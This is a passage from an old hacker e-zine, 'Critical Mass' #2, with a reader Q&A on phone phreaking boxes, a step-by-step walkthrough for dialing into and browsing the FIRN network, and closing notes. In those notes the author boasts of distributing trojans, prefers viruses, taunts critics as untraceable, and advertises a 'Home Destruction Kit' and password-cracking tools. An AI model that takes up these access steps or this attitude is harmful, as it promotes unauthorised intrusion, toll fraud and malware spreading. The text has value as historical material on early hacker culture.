to find. You just got to look around, if you know what I mean.
         The second question. I think you really mean a "red box". This baby
simulates the tones needed to perform nickel, quarter and dime tones. I hate
to tell you this, but I only have plans for the blue, silver, white and black
box at this time. I don't know what type of computer(s) you have, but if you
have a c64 there are tons of great programs you can get. The only problem
is that none of the boxes can be used in our area code. That's not to say that
you can't use it outside our area code though. I know that 800 and 305 work,
along with 205 and others, but if I were you, I would just stay away from it
all. Since the equipment replacing and such, it is becoming more difficult to
box. Mostly off 800, doing that is nuts. I can probably get the tones and 
make up a schematic if you still desire one.
         Third, when connecting to FIRN, your terminal identifier should be "a".
If this doesn't work try "d". Happy hacking..........



         I'm having trouble navigating through FIRN. Could you or somebody give
me some help or some pointers about what I am doing wrong? Thanks

If you have never been on the FIRN system, follow the directions below:

                     Call 488-0650 with your modem
                     wait for a connect and shit chars to be received
                     press return
                     at the terminal identifier type <a>
                     at the login prompt enter <menu>
                     press return
                     at the first menu type <2>
                     press return
                     at the next menu type <p>
                     press return
                     wait for about 5 sec.
                     press return twice
                     at the "#" prompt enter <call 200>
                     press return
                     wait for about 5 sec.
                     press return twice
                     you should now see a "Local>" prompt
                     type <show users>
                     press return

If you don't know what to do, or how anything works, at any "Local>" prompt,
enter <help> and return.  This should show some self explanatory info. If you
have any problems, myself or The Beaver will help.  My knowledge of netsys's
is not cavernous, but I do know something...  Anyway, If you see me on, don't
hesitate to <broadcast> to my port (unless you see a "<l>" behind my name, if
that is the case, I can receive your msg's, but not send any).  I should be on
the DEC Call 200 area mostly every night from 11:00pm to about 3:00am (approx). 

- Shadow

                 l                                     l
                 l            Final Notes              l

         Well, this concludes the second issue of Critical Mass. I wish there
was more, but you know how it goes. Before we end this issue, I would like to 
state several things though. If you, the reader, don't like Critical Mass
or any of the software that myself, or anybody associated with Critical Mass
puts out, please contact us and not the people we know. Don't hassle them, 
hassle me. It's fun to see how stupid you guys can be. Besides, if you don't
like it, don't download it! It's as easy as that.
         I have had several people tell me (not directly) that they are going
to follow up on legal actions against me because their BBS's hard disks have
crashed. Well, I invite them to for the following reasons.........

1.  I have not crashed ANYONE's hard disk. If I did you would know. I'm not
    afraid to say 'I did it'. Based on the last trojans I have sent out,
    and yes I did in my COMMIE years, my name was beside the program all the
2.  Even if I did, you don't know my name, phone number, or address. Think
    about it.
3.  If you really thought a 22 byte long file was a 'killer game' or what not,
    you shouldn't have a hard disk in the first place. 
4.  If I hit you, you would know, instead of a little trojan. I prefer viruses,

         Actually, I expected a lot of E-mail from people that were pissed
about the IBM Home Destruction Kit, but I was taken by the positive E-mail
I got. It really threw me off! I like it though, so please keep sending your
E-mail in about questions, comments, insults you have. It's great. I can now 
be contacted at one of the following places............ Under the name 'The

Warriers Retreat
(904) 422-3606


The Reactor BBS
(904) 878-1736

           Please E-mail me. I enjoy it. The following software can be picked
up at 'The Reactor BBS'.............

The IBM Home Destruction Kit (v1.4)
Critical Mass #1  (138k+ of hack info!)
SC/HA ToolBox Hacker! (v3.0)   COMING SOON!!!!!!!!!! INCLUDES!!!!!!!!!
                               WarGame Dialer
                               Repeat Dialer
                               Sleep Function
                               Dbase Hack (490+ most popular passwords!)
                               LD account finder!
                               Much more

  These are written by myself, other software by other members includes......
The c64-128 Home Destruction Kit! (v1.0?) COMING SOON (by The Beaver)
ToolBox Hacker 1.0 for the IBM
                           Amiga (By The Shadow)  COMING SOON!

          Just keep an eye out for these, and other (if they agree to it) 
GrindLock products! 

          Once again, Thanx To: All Florida area FIRN hackers, SF's and C.C.C
                                Abigail, The Shadow (very special thanks to
                                him), Eric, all korner hacker who give info,
                                Killer (keep at it), The Baron, The Nut-Kracker
                                My Dad (yes he knows I hack), and every hacker
                                in the TLH area for just existing! And of
                                course Mark for letting me use his board to
                                post CM here in town, even though he gets
                                hassled for it. All old C.C members that still
                                hack. Pink Floyd, for the nylon. And much more!

       No Thanx To, Once again: Doug, for nothing. All NFSA sysops, except for
                                a few. Tom and Bob, after I thought they were
                                ok guys (and I still do) for saying that I u/l
                                trojans when I didn't. Why guys? Tally Net
                                sysops, for killing this text. That remote off
                                Legal3. All sysops that killed this text.

Note: When I say 'no thanx to', it's not a 'hit list', but it made me kind of 